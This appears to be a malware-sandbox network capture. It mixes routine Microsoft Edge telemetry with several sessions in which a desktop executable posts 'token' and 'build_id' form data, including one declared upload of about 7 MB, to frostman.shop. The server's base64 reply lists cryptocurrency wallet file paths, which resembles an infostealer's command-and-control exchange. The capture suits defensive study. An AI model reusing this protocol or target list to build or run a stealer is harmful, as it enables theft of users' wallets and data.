2024-12-20 06:31:52 UTC | 1012 | OUT | GET /b2?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                              Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: UID=139bc9b74b908404e24257b1734676310; XID=139bc9b74b908404e24257b1734676310
2024-12-20 06:31:52 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:52 GMT
                                                                                                                                                                                                                                                                              Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                              Via: 1.1 f7b469bae3f4a6418a1a6a50a32d318c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: SpYmMKbEDEo6bIsMa0l7iMNjoHUgmetVjvYZvWN15-xlLy2OY3gbpg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 49912 | 20.110.205.119 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:52 UTC | 1261 | OUT | GET /c.gif?rnd=1734680546567&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=796ea4f60b9c41758e1e1163076781a5&activityId=796ea4f60b9c41758e1e1163076781a5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DFA719B7D8764A69A65627E5921512AA&MUID=2FB26BEE4D14683625707EB54C6669DF HTTP/1.1
                                                                                                                                                                                                                                                                              Host: c.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; SM=T
2024-12-20 06:31:53 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                              ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                              P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=2FB26BEE4D14683625707EB54C6669DF; domain=.msn.com; expires=Wed, 14-Jan-2026 06:31:53 GMT; path=/; SameSite=None; Secure; Priority=High;
Set-Cookie: SRM_M=2FB26BEE4D14683625707EB54C6669DF; domain=c.msn.com; expires=Wed, 14-Jan-2026 06:31:53 GMT; path=/; SameSite=None; Secure;
Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:31:53 GMT; path=/; SameSite=None; Secure;
Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 20-Dec-2024 06:41:53 GMT; path=/; SameSite=None; Secure;
Date: Fri, 20 Dec 2024 06:31:52 GMT
Connection: close
Content-Length: 42
2024-12-20 06:31:53 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 49918 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:53 UTC | 329 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7G4WBI5PPH4E3EUS00HD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:53 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 57 42 49 35 50 50 48 34 45 33 45 55 53 30 30 48 44 0d 0a 43 6f 6e 74
Data Ascii: ------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------7G4WBI5PPH4E3EUS00HDContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------7G4WBI5PPH4E3EUS00HDCont
2024-12-20 06:32:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:32:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 49924 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:54 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BA168GLN7QIEUAAIWBI5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:54 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 36 38 47 4c 4e 37 51 49 45 55 41 41 49 57 42 49 35 0d 0a 43 6f 6e 74
Data Ascii: ------BA168GLN7QIEUAAIWBI5Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------BA168GLN7QIEUAAIWBI5Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------BA168GLN7QIEUAAIWBI5Cont
2024-12-20 06:31:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:55 UTC | 2228 | IN | Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              36192.168.2.749936116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:57 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----Z5FKN7900ZUAAASJWL6P
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-20 06:31:57 UTC | 331 | OUT | Data Ascii:
------Z5FKN7900ZUAAASJWL6P
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------Z5FKN7900ZUAAASJWL6P
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------Z5FKN7900ZUAAASJWL6P
Cont
2024-12-20 06:31:58 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:57 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 49934 | 20.42.65.90 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:57 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680552182&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 11828
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-20 06:31:57 UTC | 11828 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T07:42:32.180Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
2024-12-20 06:31:57 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                              Set-Cookie: MC1=GUID=6e35ea1915194f60827c787c250b6614&HASH=6e35&LV=202412&V=4&LU=1734676317548; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              Set-Cookie: MS0=16e9e5da6fc54ba1a23c96dc13249946; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:57 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                              time-delta-millis: -4234634
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:56 GMT
                                                                                                                                                                                                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 49935 | 20.42.65.90 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:57 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680552185&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                              Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 5150
                                                                                                                                                                                                                                                                              sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-20 06:31:57 UTC | 5150 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T07:42:32.185Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
2024-12-20 06:31:57 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                              P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=eb01e90bfed04ffeade7ed817ba4537a&HASH=eb01&LV=202412&V=4&LU=1734676317380; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:57 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=e07269e18ac845bcb49919770a27a177; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:57 GMT; Path=/;Secure; SameSite=None
time-delta-millis: -4234805
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 20 Dec 2024 06:31:57 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 49938 | 20.42.65.90 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:58 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680553042&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5348
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; msnup=
2024-12-20 06:31:58 UTC | 5348 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-20T07:42:33.041Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"locale
2024-12-20 06:31:58 UTC | 894 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=8aa6bec2744640c096157cbf6cca0f80&HASH=8aa6&LV=202412&V=4&LU=1734676318219; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:58 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=15f2898bb9f946a39e596a8cb51f806e; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:58 GMT; Path=/;Secure; SameSite=None
time-delta-millis: -4234823
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 20 Dec 2024 06:31:57 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 49939 | 20.42.65.90 | 443 | 1552 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:58 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680553187&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 9763
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=2FB26BEE4D14683625707EB54C6669DF; _EDGE_S=F=1&SID=145EA6F856B060B31CAAB3A3577061E4; _EDGE_V=1; msnup=
2024-12-20 06:31:58 UTC | 9763 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-20T07:42:33.186Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"c3ee07f3-66ea-4617-a85d-f00c2087a71d","epoch":"1309146888"},"app":{"loc
2024-12-20 06:31:58 UTC | 894 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=51d15f9f153f4de797cb063daedcfd35&HASH=51d1&LV=202412&V=4&LU=1734676318375; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:58 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=3870d54140d34b02945186551103302c; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:58 GMT; Path=/;Secure; SameSite=None
time-delta-millis: -4234812
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Fri, 20 Dec 2024 06:31:57 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 49945 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:59 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----UKX47GDB1DJEUA1NYM79
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:59 UTC | 1825 | OUT | Data Ascii: ------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------UKX47GDB1DJEUA1NYM79Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------UKX47GDB1DJEUA1NYM79Cont
